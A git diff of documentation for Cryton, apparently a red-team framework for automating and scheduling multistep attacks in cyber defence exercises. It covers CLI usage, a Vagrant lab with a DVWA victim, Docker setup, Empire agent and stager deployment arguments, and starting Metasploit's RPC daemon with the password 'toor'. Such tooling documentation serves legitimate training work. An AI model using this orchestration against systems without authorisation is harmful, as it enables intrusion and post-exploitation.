example "Example" + + ```shell + cryton-cli runs execute 1 + ``` + + Expected output: + ``` + Run successfully executed! (Run 1 was executed.) + ``` + +=== "schedule it for later" + + Run executions can be scheduled to a specific date and time. By default, the system timezone will be used. To use the UTC timezone, use the `--utc-timezone` flag. + ```shell + cryton-cli runs schedule <RUN_ID> <DATE> <TIME> + ``` + + ??? example "Example" + + ```shell + cryton-cli runs schedule 1 2020-06-08 10:00:00 + ``` + + Expected output: + ``` + Run successfully scheduled! (Run 1 is scheduled for 2020-06-08 10:00:00.) + ``` + +## Show Run information +To see if the executed Run has finished, you can check its state (and other useful information): +```shell +cryton-cli runs show <RUN_ID> +``` + +??? example "Example" + + ```shell + cryton-cli runs show 1 + ``` + + Expected output: + ``` + id: 1, schedule_time: None, start_time: 2021-05-24T00:08:45.200025, pause_time: None, finish_time: 2021-05-24T00:09:18.397199, state: RUNNING + ``` + +## Get a report +It is crucial to know the current state of your Run and its results. That is why a report can be generated anytime during the execution: +```shell +cryton-cli runs report <RUN_ID> +``` + +??? example "Example" + + ```shell + cryton-cli runs report 1 + ``` + + Expected output: + ``` + Successfully created Run's report! (file saved at: /tmp/report_run_1_2020-06-08-10-15-00-257994_xdQeV) + ``` + +??? tip "Read the report directly" + + Reports can be viewed directly in cryton-cli (**to quit, press Q**): + ```shell + cryton-cli runs report <RUN_ID> --less + ``` + + ??? 
example "Example" + + ```shell + cryton-cli runs report 1 --less + ``` diff --git a/docs/2022.2/starting-point/testing-environment.md b/docs/getting-started/playground.md similarity index 85% rename from docs/2022.2/starting-point/testing-environment.md rename to docs/getting-started/playground.md index 6a27fb5237922ceb7e2b4ddc351126ae086b072f..42eeadef78a2cf7f3fb3abc6b80c9b5b03ffbc53 100644 --- a/docs/2022.2/starting-point/testing-environment.md +++ b/docs/getting-started/playground.md @@ -7,7 +7,7 @@ Cryton toolset is tested and targeted primarily on **Debian** and **Kali Linux** use it everywhere if the requirements are met. Please keep in mind that **only the latest version is supported** and issues regarding different OS or distributions may **not** be resolved. -[Link to the Cryton toolset documentation](https://cryton.gitlab-pages.ics.muni.cz/cryton-documentation/). +[Link to the Cryton toolset documentation](https://cryton.gitlab-pages.ics.muni.cz/cryton-documentation/){target="_blank"}. ## Installation and setup It is recommended to use the Vagrant environment due to its easier setup and usage. @@ -16,9 +16,9 @@ It is recommended to use the Vagrant environment due to its easier setup and usa This section describes how to quickly build the [infrastructure](#infrastructure) and run the tests. **Requirements**: -- [Vagrant](https://www.vagrantup.com/) -- [Virtualbox](https://www.virtualbox.org/) -- [Ansible](https://docs.ansible.com/ansible/latest/index.html) +- [Vagrant](https://www.vagrantup.com/){target="_blank"} +- [Virtualbox](https://www.virtualbox.org/){target="_blank"} +- [Ansible](https://docs.ansible.com/ansible/latest/index.html){target="_blank"} Check if the requirements are met using: ```shell @@ -32,7 +32,7 @@ Go to the correct directory, if you haven't already: cd cryton-e2e ``` -Download the *[Cryton Deploy](https://gitlab.ics.muni.cz/cryton/cryton-deploy)* project. 
+Download the *[Cryton Deploy](https://gitlab.ics.muni.cz/cryton/cryton-deploy){target="_blank"}* project. ```shell git clone https://gitlab.ics.muni.cz/cryton/cryton-deploy.git ``` @@ -73,21 +73,21 @@ If there is a connection error due to an ssh problem, just shut down the machine (`vagrant halt <machine>`) and run `vagrant up` again. ### Manual installation (NOT RECOMMENDED) -This segment only explains how to install the **[Cryton E2E](https://gitlab.ics.muni.cz/cryton/cryton-e2e)** +This segment only explains how to install the **[Cryton E2E](https://gitlab.ics.muni.cz/cryton/cryton-e2e){target="_blank"}** package. To be able to run the tests, you need to install the -**[Cryton CLI](https://gitlab.ics.muni.cz/cryton/cryton-cli)**, -**[Cryton Core](https://gitlab.ics.muni.cz/cryton/cryton-core)** -and **[Cryton Worker](https://gitlab.ics.muni.cz/cryton/cryton-worker)** packages. +**[Cryton CLI](https://gitlab.ics.muni.cz/cryton/cryton-cli){target="_blank"}**, +**[Cryton Core](https://gitlab.ics.muni.cz/cryton/cryton-core){target="_blank"}** +and **[Cryton Worker](https://gitlab.ics.muni.cz/cryton/cryton-worker){target="_blank"}** packages. It is not necessary to install this tool manually, you can use the **tester** machine. This can be done using `vagrant up tester --provision-with playbook,install-dependencies,setup-e2e-local`. 
**Requirements**: -- [Vagrant](https://www.vagrantup.com/) -- [Virtualbox](https://www.virtualbox.org/) -- [Ansible](https://docs.ansible.com/ansible/latest/index.html) -- [Python](https://www.python.org/) >=3.8 -- [pipenv](https://github.com/pypa/pipenv) +- [Vagrant](https://www.vagrantup.com/){target="_blank"} +- [Virtualbox](https://www.virtualbox.org/){target="_blank"} +- [Ansible](https://docs.ansible.com/ansible/latest/index.html){target="_blank"} +- [Python](https://www.python.org/){target="_blank"} >=3.8 +- [pipenv](https://github.com/pypa/pipenv){target="_blank"} Check if the requirements are met using: ```shell @@ -104,7 +104,7 @@ cd cryton-e2e ``` If you want to be able to use the Vagrant environment, clone the -*[Cryton Deploy](https://gitlab.ics.muni.cz/cryton/cryton-deploy)* project. +*[Cryton Deploy](https://gitlab.ics.muni.cz/cryton/cryton-deploy){target="_blank"}* project. ```shell git clone https://gitlab.ics.muni.cz/cryton/cryton-deploy.git ``` @@ -177,7 +177,7 @@ None for now. #### Additional requirements for advanced test 1. Worker must be able to connect to the `msfrpcd` in order to successfully use MSFListener. 2. Worker must be installed on a machine with the IP address specified in the `config.yml` file. -3. [Empire](https://github.com/BC-SECURITY/Empire) server must be running on the localhost. +3. [Empire](https://github.com/BC-SECURITY/Empire){target="_blank"} server must be running on the localhost. 4. Worker has to be able to connect to running Empire server (you have to update Worker's settings). #### Additional requirements for http_trigger test @@ -188,7 +188,7 @@ None for now. 2. Worker must be installed on a machine with the IP address specified in the `config.yml` file. #### Additional requirements for empire test -1. [Empire](https://github.com/BC-SECURITY/Empire) server must be running on the localhost. +1. [Empire](https://github.com/BC-SECURITY/Empire){target="_blank"} server must be running on the localhost. 2. 
Worker has to be able to connect to running Empire server (you have to update Worker's settings). ## Infrastructure @@ -197,7 +197,7 @@ The infrastructure consists of 4 machines that are used for testing. ### Tester machine The machine contains *Cryton CLI* and *Cryton E2E* tools. -Base machine is [debian 11](https://app.vagrantup.com/debian/boxes/bullseye64). +Base machine is [debian 11](https://app.vagrantup.com/debian/boxes/bullseye64){target="_blank"}. To start the machine use: ```shell @@ -207,7 +207,7 @@ vagrant up tester ### Core machine The machine contains the *Cryton Core* tool. -Base machine is [debian 11](https://app.vagrantup.com/debian/boxes/bullseye64). +Base machine is [debian 11](https://app.vagrantup.com/debian/boxes/bullseye64){target="_blank"}. To start the machine use: ```shell @@ -218,7 +218,7 @@ vagrant up core ### Worker machine The machine contains the *Cryton Worker* tool. Also hosts an empire server and Metasploit framework. -Base machine is [debian 11](https://app.vagrantup.com/debian/boxes/bullseye64). +Base machine is [debian 11](https://app.vagrantup.com/debian/boxes/bullseye64){target="_blank"}. To start the machine use: ```shell @@ -226,9 +226,9 @@ vagrant up worker ``` ### Victim machine -Machine hosts [DVWA](https://dvwa.co.uk/). +Machine hosts [DVWA](https://dvwa.co.uk/){target="_blank"}. -Base machine is [debian 11](https://app.vagrantup.com/debian/boxes/bullseye64). +Base machine is [debian 11](https://app.vagrantup.com/debian/boxes/bullseye64){target="_blank"}. To start the machine use: ```shell @@ -258,7 +258,7 @@ Some environment variables can be overridden in CLI. 
Try using `cryton-e2e --hel Settings description: - `CRYTON_CLI_*` - Cryton CLI environment variables' description can be found it the -**[Cryton CLI repository](https://gitlab.ics.muni.cz/cryton/cryton-cli)** +**[Cryton CLI repository](https://gitlab.ics.muni.cz/cryton/cryton-cli){target="_blank"}** - `CRYTON_E2E_CRYTON_CLI_EXECUTABLE` - (**string**) Path to the Cryton CLI executable (`/path/to/cryton-cli`) - `CRYTON_E2E_DIRECTORY` - (**string**) Path to the Cryton E2E directory (`/path/to/cryton-e2e`) diff --git a/docs/getting-started/quick-start.md b/docs/getting-started/quick-start.md new file mode 100644 index 0000000000000000000000000000000000000000..f127211a06e5ef1a459f24fc4356148cd332a60a --- /dev/null +++ b/docs/getting-started/quick-start.md @@ -0,0 +1,101 @@ +This example will allow you to quickly install the main Cryton tools using **Docker Compose**. + +??? question "Want more deployment options?" + + - [Core](../components/core.md) + - [Worker](../components/worker.md) + - [Modules](../components/modules.md) + - [CLI](../components/cli.md) + - [Frontend](../components/frontend.md) + +!!! info "System requirements" + + Please make sure you are using a system that has at least **2048 MB of RAM** and **2 CPU cores**, otherwise you might experience stability issues. + +[//]: # (TODO: make a video) + +## Installation + +!!! danger "Requirements" + + - [Git](https://git-scm.com/){target="_blank"} + - [Docker Compose](https://docs.docker.com/compose/install/){target="_blank"} + +!!! 
tip "Recommendations" + + - Docker [post-installation steps](https://docs.docker.com/engine/install/linux-postinstall/){target="_blank"} + - [Production deployment](../production.md) + +First, create a new directory: +```shell +mkdir cryton +cd cryton +``` + +Clone the modules: +```shell +git clone https://gitlab.ics.muni.cz/cryton/cryton-modules.git --branch {{{ git_release }}} +``` + +Download the .env file (settings): + +=== "curl" + + ```shell + curl -O {{{config.site_url}}}{{{ release_version }}}/getting-started/.env + ``` + +=== "wget" + + ```shell + wget {{{config.site_url}}}{{{ release_version }}}/getting-started/.env + ``` + +??? abstract "Show the .env file" + + ```ini + {! include ".env" !} + ``` + +Download the Compose configuration: + +=== "curl" + + ```shell + curl -O {{{config.site_url}}}{{{ release_version }}}/getting-started/docker-compose.yml + ``` + +=== "wget" + + ```shell + wget {{{config.site_url}}}{{{ release_version }}}/getting-started/docker-compose.yml + ``` + +??? abstract "Show the Compose config" + + ```yaml + {! include "docker-compose.yml" !} + ``` + +Run the Compose configuration: +```shell +docker compose up -d +``` + +## Test the installation +Now we want to test if the CLI, Worker, and Core are communicating. 
+ +Start an interactive shell in the cryton-cli container: +```shell +docker compose exec cryton_cli bash +``` + +Create (register) the Worker: +```shell +cryton-cli workers create local_worker -d "my local worker for testing" +``` + +Check if the Worker is reachable (use the **id** from the previous command): +```shell +cryton-cli workers health-check <id> +``` diff --git a/docs/getting-started/workflow.md b/docs/getting-started/workflow.md new file mode 100644 index 0000000000000000000000000000000000000000..1b9f01ce42fb76f332a4b935627dc51f6c7c107f --- /dev/null +++ b/docs/getting-started/workflow.md @@ -0,0 +1,45 @@ +The following is the ideal sequence of steps to use when you are planning an attack and using Cryton to automate it. + +## Deployment +First, you need to prepare an infrastructure for your cyber defense exercise. Deploying the Cryton toolset should be part of it: + +1. Install and set up [Core](../components/core.md) +2. Install [CLI](../components/cli.md) and [Frontend](../components/frontend.md) +3. Install and set up your [Worker(s)](../components/worker.md) +4. Make sure it works: + - Core is up and running + - CLI/Frontend can access Core's REST API + - Worker(s) are up and running + - Worker(s) are connected to the RabbitMQ server + +Once the Cryton tools are deployed, you can start planning your attack. + +!!! tip "Tips" + + - CLI and Frontend can be deployed outside the infrastructure since other components don't need access to them + - Use one worker per team infrastructure + +!!! note "" + + This section can be represented by the [quick-start](quick-start.md) guide. + +## Attack planning +Every Run can be described by a simple formula: +``` +plan template + inventory = Plan instance +Plan instance + Worker = Plan execution +Plan instance + Workers = Run +``` + +Which results in the following steps: + +1. Choose or design a plan template +2. Create a Plan instance +3. Register the Worker(s) +4. Create a Run +5. 
Schedule or execute the Run +6. Get the Run Report + +!!! note "" + + More information about this section can be found in the [execution example](execution-example.md). diff --git a/docs/2022.2/images/cryton-architecture.png b/docs/images/cryton-architecture.png similarity index 100% rename from docs/2022.2/images/cryton-architecture.png rename to docs/images/cryton-architecture.png diff --git a/docs/2022.2/images/design-plan.png b/docs/images/design-plan.png similarity index 100% rename from docs/2022.2/images/design-plan.png rename to docs/images/design-plan.png diff --git a/docs/2022.2/images/design-stage.png b/docs/images/design-stage.png similarity index 100% rename from docs/2022.2/images/design-stage.png rename to docs/images/design-stage.png diff --git a/docs/2022.2/images/design-template.png b/docs/images/design-template.png similarity index 100% rename from docs/2022.2/images/design-template.png rename to docs/images/design-template.png diff --git a/docs/images/gitlab-download.png b/docs/images/gitlab-download.png new file mode 100644 index 0000000000000000000000000000000000000000..e5c954abad365b19e3322ace81355a55acc942e3 Binary files /dev/null and b/docs/images/gitlab-download.png differ diff --git a/docs/2022.2/images/redoc-preview.png b/docs/images/redoc-preview.png similarity index 100% rename from docs/2022.2/images/redoc-preview.png rename to docs/images/redoc-preview.png diff --git a/docs/2022.2/images/states-plan.png b/docs/images/states-plan.png similarity index 100% rename from docs/2022.2/images/states-plan.png rename to docs/images/states-plan.png diff --git a/docs/2022.2/images/states-run.png b/docs/images/states-run.png similarity index 100% rename from docs/2022.2/images/states-run.png rename to docs/images/states-run.png diff --git a/docs/2022.2/images/states-stage.png b/docs/images/states-stage.png similarity index 100% rename from docs/2022.2/images/states-stage.png rename to docs/images/states-stage.png diff --git 
a/docs/2022.2/images/states-step.png b/docs/images/states-step.png similarity index 100% rename from docs/2022.2/images/states-step.png rename to docs/images/states-step.png diff --git a/docs/2022.2/images/swagger-preview.png b/docs/images/swagger-preview.png similarity index 100% rename from docs/2022.2/images/swagger-preview.png rename to docs/images/swagger-preview.png diff --git a/docs/index.md b/docs/index.md index b632ae0cb4da42b8c5775260bbd21506d126facb..12a591317d2bfb1ddd7ba0c3cbe1e834518cf8aa 100644 --- a/docs/index.md +++ b/docs/index.md @@ -1,22 +1,23 @@ -## About Cryton -Cryton is a Cron-like red team framework for complex attack scenarios automation and scheduling. Through the usage of Core, +Cryton toolset is a Cron-like red team framework for complex attack scenarios automation and scheduling. Through the usage of Core, Worker, and attack modules it provides ways to plan, execute and evaluate multistep attacks. -All of its open-source components [can be found here](https://gitlab.ics.muni.cz/cryton). +???+ question "Are there any other usages?" -The lifecycle of the Attack scenario in the Cryton context can be seen in the following picture: - + - Breach & attack emulation + - Automation of penetration testing and infrastructure scanning + - Scheduler or executor across multiple environments + +!!! tip "No time to read?" + + Check out the [quick-start](getting-started/quick-start.md) guide. -With Cryton you can: +The lifecycle of the attack scenario in the Cryton context can be seen in the following picture: + -* Design an attack **Template** -* Create an **Instance** -* Schedule (or directly Execute) a **Run** -* Generate a **Report** -* Evaluate results +All of its open-source components [can be found here](https://gitlab.ics.muni.cz/cryton){target="_blank"}. ## Purpose -The purpose of the Cryton tool is **to execute complex attack scenarios, in which the system under test is known in advance**. 
+The main purpose of the Cryton is **to execute complex attack scenarios, in which the system under test is known in advance**. It was designed as such to assist red teams in cybersecurity exercises in means of repeatability of certain attack scenarios. These scenarios are often prepared in advance and reflect vulnerabilities hidden in the blue team's infrastructure. @@ -28,63 +29,19 @@ do that effectively? This is where Cryton comes to play. If you know all the vulnerabilities in the trainees' system - and you do - you can prepare an attack scenario to check if they are still available and working after the fix. Cryton will execute the plan against -all targets you tell it to and then generate reports (human and machine process-able). You can then not only see, which +all targets you tell it to and then generate reports (human and machine-readable). You can then not only see, which attack steps did succeed on which system, but also score your trainees based on these results. With this in mind, you should not expect Cryton to be some kind of evil artificial intelligence capable of taking over the -world. It is simply a scheduler for python modules. Scheduler which executes these modules according to some execution +world. It is simply a scheduler for python modules. The scheduler executes these modules according to some execution tree with conditions based on each step of the scenario. Each module is a script orchestrating some well-known attack tools, but that is it. ## Support -Cryton toolset is tested and targeted primarily on **Debian** and **Kali Linux**, however it **should** be possible to +Cryton toolset is tested and targeted primarily on **Debian** and **Kali Linux**. However, it **should** be possible to use it everywhere if the requirements are met. Please keep in mind that **only the latest version is supported** and issues regarding different OS or distributions may **not** be resolved. 
-More detailed information can be found in each release's documentation or each project's README. - -## Technological decisions -The next section tries to explain the choices for currently employed technologies. Please take into account that these -technologies are not supposed to be final and unchangeable. They just appeared to be best suited for the task at the -time of development, they may change in the future. - -### APScheduler -This was the first choice made for the scheduler module. It allows you to time your python function to be scheduler on -a specific time or day or even interval. It is pretty lightweight and does not need much in terms of resources or -capacity. So far I have not found anything better suited for the task. There is though one small problem with running -it as a service, but there are ways around it. - -### Django ORM -In the beginning, Cryton used the SQLite database with direct access. That changed as SQLite is not good with scaling -for the future. The second choice was PostgreSQL, which stayed to this day, but it was updated with the use of Django ORM. -Using the Django REST framework for the REST interface also emerged from this choice. - -### Rabbit MQ -For developing Master-Worker architecture, where you can issue commands remotely, we needed some kind of RPC. Although, -as experience showed us, we also needed it to be asynchronous. That's why we chose a messaging system Rabbit MQ. - -### Metasploit -I guess everyone in the IT security field has heard about the Metasploit framework. It is one of the most complete and usable -open-source attack tools available. Of course, Cryton uses it for some attack modules - the majority of simulated attacks -in CDXs usually do use Metasploit in some way. But its attacking capabilities are not the only reason to use it. Its -real advantage is Metasploit's session management. 
Every time you open a session to some machine it stores it under -a specific ID which you can later use to communicate with the target. This is one of the main features you can use while -executing your attack scenario in Cryton. - -### Empire -For post-exploitation attacks, we decided to add support for an open-source project called Empire. Empire is -a post-exploitation framework that includes pure-PowerShell Windows agents, Python 3 Linux/OS X agents, and C# agents. -The framework offers cryptological-secure communications and flexible architecture. This is done via asynchronous -communication between our Worker component and an Empire c2 server. - -### Docker (compose) -To bundle everything together and make the deployment effortless, we use docker-compose. +!!! note "" -## Authors -| Surname | Name | Role | -|---------|--------|-------------------------| -| Boháček | Milan | Python developer | -| Drobňák | Michal | Frontend developer | -| Nutár | Ivo | Technical leader | -| Rája | Jiří | Senior Python developer | -| Tomči | Andrej | Senior Python developer | + The Docker images should render the support limitations irrelevant. diff --git a/docs/2022.2/integrated-tools/empire.md b/docs/integrated-tools/empire.md similarity index 84% rename from docs/2022.2/integrated-tools/empire.md rename to docs/integrated-tools/empire.md index 62c39e976c5d32aee2339c735706fec1f50ee1ec..48fe637bb1c13379b9227a99056e9b0cb2657d28 100644 --- a/docs/2022.2/integrated-tools/empire.md +++ b/docs/integrated-tools/empire.md @@ -1,4 +1,4 @@ -Description of [Empire](https://github.com/BC-SECURITY/Empire) functionalities supported by Cryton. +Description of [Empire](https://github.com/BC-SECURITY/Empire){target="_blank"} functionalities supported by Cryton. **functionalities:** <ol> @@ -8,9 +8,9 @@ Description of [Empire](https://github.com/BC-SECURITY/Empire) functionalities s ## requirements for usage with Core: - Installed and running Empire server with version 4.1.0 and above. 
Installation guide -[here](https://bc-security.gitbook.io/empire-wiki/quickstart/installation) -- Installed all main Cryton components, that is [Core](../starting-point/core.md), [Worker](../starting-point/worker.md) and -[Cli](../starting-point/cli.md) +[here](https://bc-security.gitbook.io/empire-wiki/quickstart/installation){target="_blank"} +- Installed all main Cryton components, that is [Core](../components/core.md), [Worker](../components/worker.md) and +[Cli](../components/cli.md) - Empire server needs to be able to communicate with Worker component **For Empire usage only with Worker see documentation [here](../interfaces/worker-rabbit-api.md#rabbit-api).** @@ -25,19 +25,19 @@ This functionality uses `step_type: empire/agent-deploy` and enables to deploy E **Usable arguments for this step type are:** -| Argument | Description | -|-----------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `listener_name` | Name of listener in Empire for identification. If listener with this name already exists in Empire, it will be used for stager generation. | -| `listener_port`<br>(optional) | Port on which should be listener communicating with Agents. | -| `listener_options`<br>(optional) | Additional adjustable parameters for creating listener. More on [here](https://github.com/BC-SECURITY/Empire/tree/master/empire/server/listeners). | -| `listener_type`<br>(optional) | Type of listener (default: http). | -| `stager_type` | Type of stager that should be generated in form of path (example: `multi/bash'). For stager types look [here](https://github.com/BC-SECURITY/Empire/tree/master/empire/server/stagers). | -| `stager_options`<br>(optional) | Additional adjustable parameters for generating stager. 
Parameters can be viewed in individual stager python files or through Empire client. | -| `agent_name` | Name for the deployed agent which is going to be used as a reference to this agent later. | -| `use_named_session`<br>(optional) | Name of created msf session through Cryton. | -| `use_any_session_to_target`<br>(optional) | Ip address of target on which has been created msf session | -| `session_id`<br>(optional) | ID of msf session to target. | -| [`ssh_connection`](#arguments-for-ssh_connection)<br>(optional) | Arguments for creating ssh connection to target. | +| Argument | Description | +|-----------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| `listener_name` | Name of listener in Empire for identification. If listener with this name already exists in Empire, it will be used for stager generation. | +| `listener_port`<br>(optional) | Port on which should be listener communicating with Agents. | +| `listener_options`<br>(optional) | Additional adjustable parameters for creating listener. More on [here](https://github.com/BC-SECURITY/Empire/tree/master/empire/server/listeners){target="_blank"}. | +| `listener_type`<br>(optional) | Type of listener (default: http). | +| `stager_type` | Type of stager that should be generated in form of path (example: `multi/bash'). For stager types look [here](https://github.com/BC-SECURITY/Empire/tree/master/empire/server/stagers){target="_blank"}. | +| `stager_options`<br>(optional) | Additional adjustable parameters for generating stager. Parameters can be viewed in individual stager python files or through Empire client. | +| `agent_name` | Name for the deployed agent which is going to be used as a reference to this agent later. 
| +| `use_named_session`<br>(optional) | Name of created msf session through Cryton. | +| `use_any_session_to_target`<br>(optional) | Ip address of target on which has been created msf session | +| `session_id`<br>(optional) | ID of msf session to target. | +| [`ssh_connection`](#arguments-for-ssh_connection)<br>(optional) | Arguments for creating ssh connection to target. | ### Arguments for `ssh_connection` @@ -72,11 +72,11 @@ This functionality uses `step_type: empire/execute` and allows the execution of **To execute an Empire module use the following arguments:** -| Argument | Description | -|----------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `use_agent` | Name of an active agent that checked on Empire server. | -| `module` | Name of Empire module in form of a path that should be executed on the active agent (example: `collection/sniffer`). Available Empire modules [here](https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules). | -| `module_arguments`<br>(optional) | Additional arguments for Empire module execution. | +| Argument | Description | +|----------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| `use_agent` | Name of an active agent that checked on Empire server. | +| `module` | Name of Empire module in form of a path that should be executed on the active agent (example: `collection/sniffer`). Available Empire modules [here](https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules){target="_blank"}. | +| `module_arguments`<br>(optional) | Additional arguments for Empire module execution. 
| ### Example diff --git a/docs/2022.2/integrated-tools/metasploit.md b/docs/integrated-tools/metasploit.md similarity index 73% rename from docs/2022.2/integrated-tools/metasploit.md rename to docs/integrated-tools/metasploit.md index 34b785e434a9ec01f52c9d6df047bf19ef76700d..9ecd002456070ce71d3a3e4a77d9174f4c474dbb 100644 --- a/docs/2022.2/integrated-tools/metasploit.md +++ b/docs/integrated-tools/metasploit.md @@ -1,13 +1,23 @@ -Description of [Metasploit](https://github.com/rapid7/metasploit-framework) functionalities supported by Cryton. +Description of [Metasploit](https://github.com/rapid7/metasploit-framework){target="_blank"} functionalities supported by Cryton. ## Setup To be able to use MSF, it must be accessible to the Worker. All you need to do is start the msfrpc(d) module in MSF and set Worker's environment `CRYTON_WORKER_MSFRPCD_*` variables. After that, if you start the Worker and a connection is created, you will see the following message: `Connected to msfrpcd.`. +### Start MSFRPC + +``` +load msgrpc ServerHost=127.0.0.1 ServerPort=55553 User=msf Pass='toor' SSL=true +``` + +``` +msfrpcd -P toor +``` + ## Session management Cryton allows you to utilize sessions from Metasploit. To learn how, see -[session management](../designing-phase/session-management.md). +[session management](../designing-phase/step.md#session-management). ## MSF listener Cryton allows creating a Stage that will start an MSF listener on Worker and will wait until it returns a session that matches diff --git a/docs/2022.2/interfaces/cli.md b/docs/interfaces/cli.md similarity index 97% rename from docs/2022.2/interfaces/cli.md rename to docs/interfaces/cli.md index 125876bf9822573f480a2b61ee9a39c119a5e35c..1dcbc4a2598a01c12f73cb5cdb0b9e5e1f66a9f1 100644 --- a/docs/2022.2/interfaces/cli.md +++ b/docs/interfaces/cli.md @@ -1,6 +1,5 @@ CLI implements capabilities of the Cryton's REST API and can be automated by using custom scripts. 
-To start the CLI just type `cryton-cli` and the following help page should show: ``` Usage: cryton-cli [OPTIONS] COMMAND [ARGS]... @@ -28,19 +27,6 @@ Commands: workers Manage Workers from here. ``` -The default Cryton's REST API address and port are **localhost** and **8000**. To override this use `-H` and `-p` options. -Optionally use the `--secure` flag to use the *HTTPS* protocol or the `--debug` flag for non-formatted output. -``` -cryton-cli -H 127.0.0.1 -p 8000 --secure --debug <your command> -``` - -To learn about each command's options use: -``` -cryton-cli <your command> --help -``` - -For a better understanding of the results, we highlight the successful ones with **green** and the others with **red**. - ## execution-variables Manage Execution variables from here. diff --git a/docs/2022.2/interfaces/core-rest-api.md b/docs/interfaces/core-rest-api.md similarity index 98% rename from docs/2022.2/interfaces/core-rest-api.md rename to docs/interfaces/core-rest-api.md index b2fbab57d4f61b5ba46904ada1231d8bfa386195..5c88656f8baa19fc495359d945de21bfd18f3b96 100644 --- a/docs/2022.2/interfaces/core-rest-api.md +++ b/docs/interfaces/core-rest-api.md @@ -1,19 +1,20 @@ This document provides documentation of the Cryton REST API endpoints. -It was automatically generated from Swagger via the [swagger-markdown](https://www.npmjs.com/package/swagger-markdown) tool. -If you are interested in Swagger interactive documentation, open the Cryton REST API or browse to the `/doc` endpoint. -For example: `<cryton_rest_api_address>:<cryton_rest_api_port>` or `<cryton_rest_api_address>:<cryton_rest_api_port>/doc`. +If you are interested in the Swagger interactive documentation, open the Cryton REST API or browse to the `/doc` endpoint. +For example: [http://127.0.0.1:8000/doc/](http://127.0.0.1:8000/doc/){target="_blank"}.  -If you are interested in Redoc interactive documentation, browse to the `/redoc` endpoint on Cryton REST API. 
-For example: `<cryton_rest_api_address>:<cryton_rest_api_port>/redoc`. +If you are interested in the Redoc interactive documentation, browse to the `/redoc` endpoint on Cryton REST API. +For example: [http://127.0.0.1:8000/redoc/](http://127.0.0.1:8000/redoc/){target="_blank"}. - + + +!!! danger "" -**Notice:** Uploaded byte files must be encoded using UTF-8. + Uploaded byte files must be encoded using UTF-8. -## Version: 1.0.0 +## API ### /api/execution_variables/ diff --git a/docs/2022.2/interfaces/frontend.md b/docs/interfaces/frontend.md similarity index 100% rename from docs/2022.2/interfaces/frontend.md rename to docs/interfaces/frontend.md diff --git a/docs/2022.2/interfaces/worker-rabbit-api.md b/docs/interfaces/worker-rabbit-api.md similarity index 96% rename from docs/2022.2/interfaces/worker-rabbit-api.md rename to docs/interfaces/worker-rabbit-api.md index 39a05075a521a40b8fbe24f20487b2af0b5f0180..6c6a4f078680eb795fc1a218b520a7a10ccc9ded 100644 --- a/docs/2022.2/interfaces/worker-rabbit-api.md +++ b/docs/interfaces/worker-rabbit-api.md @@ -1,5 +1,4 @@ -It is possible to use Cryton Worker as a standalone application and control it using your own requests. -Worker utilizes [RabbitMQ](https://www.rabbitmq.com/) as it's messaging protocol for asynchronous RPC. +Worker utilizes [RabbitMQ](https://www.rabbitmq.com/){target="_blank"} as it's messaging protocol for asynchronous RPC. ## Rabbit API Worker is able to process any request sent through RabbitMQ to its Queues (`cryton_worker.WORKER_NAME.attack.request`, diff --git a/docs/license.md b/docs/license.md index 208b3d0cbc0a9eeb574efdd417a5ca97da4b3bad..29f85aaf09ed91e7f6d3df0a1de3a4617922c690 100644 --- a/docs/license.md +++ b/docs/license.md @@ -1,7 +1,7 @@ Cryton is open-source software developed by **Masaryk University**, and distributed under **MIT license**. 
## License Terms -**Copyright 2022 MASARYK UNIVERSITY** +**Copyright 2023 MASARYK UNIVERSITY** Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the “Software”), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: diff --git a/docs/logging.md b/docs/logging.md new file mode 100644 index 0000000000000000000000000000000000000000..7b1cbbe1fa255745487af70176a9f43ce9d28271 --- /dev/null +++ b/docs/logging.md @@ -0,0 +1,47 @@ +The logs adhere to the following format: +``` +{"queue": "cryton_core.control.request", "event": "Queue declared and consuming", "logger": "cryton-debug", "level": "info", "timestamp": "2021-05-18T11:19:20.012152Z"} +{"plan_name": "Example scenario", "plan_id": 129, "status": "success", "event": "plan created", "logger": "cryton", "level": "info", "timestamp": "2021-05-18T06:17:39.753017Z"} +``` + +Logs are stored in the app directory, which can be found at `~/.local/cryton_<app>`. +In case you're running the app in a Docker container the logs will be saved inside the container. + +## Core +Every change of state is logged for later analysis. Every Step the result is also logged, although +the output is not. It can be found in the database. + +You can switch between the debug and the production loggers using the environment variable *CRYTON_CORE_DEBUG*. +To run tests, we use a testing logger to avoid saving unwanted logs. 
+ +**Production** (`cryton-core`) + +- RotatingFileHandler (*CRYTON_CORE_APP_DIRECTORY*/log/cryton-core.log) + +**Debug** (`cryton-core-debug`) + +- RotatingFileHandler (*CRYTON_CORE_APP_DIRECTORY*/log/cryton-core-debug.log) +- Console (std_out) + +**Testing** (`cryton-core-test`) + +- Console (std_out) + +## Worker +Each request and its processing are logged for later analysis. + +You can switch between the debug and the production loggers using the environment variable *CRYTON_WORKER_DEBUG*. +To run tests, we use a testing logger to avoid saving unwanted logs. + +**Production** (`cryton-worker`) + +- RotatingFileHandler (*CRYTON_WORKER_APP_DIRECTORY*/log/cryton-worker.log) + +**Debug** (`cryton-worker-debug`) + +- RotatingFileHandler (*CRYTON_WORKER_APP_DIRECTORY*/log/cryton-worker-debug.log) +- Console (std_out) + +**Testing** (`cryton-worker-test`) + +- Console (std_out) diff --git a/docs/production.md b/docs/production.md new file mode 100644 index 0000000000000000000000000000000000000000..59efd3895b23fdbe4c36a67dd8c18318e3673f66 --- /dev/null +++ b/docs/production.md @@ -0,0 +1,26 @@ +There are some rules you should follow when deploying Cryton to a production environment. + +## Core +### Settings +Update these settings to not use the default values + +- CRYTON_CORE_RABBIT_PASSWORD +- CRYTON_CORE_DB_PASSWORD +- CRYTON_CORE_API_SECRET_KEY + +### Proxy +Hide the rest API behind a proxy with restricted access. + +!!! tip + + Use the officially supplied docker-compose.yml and add a .htaccess file to it. 
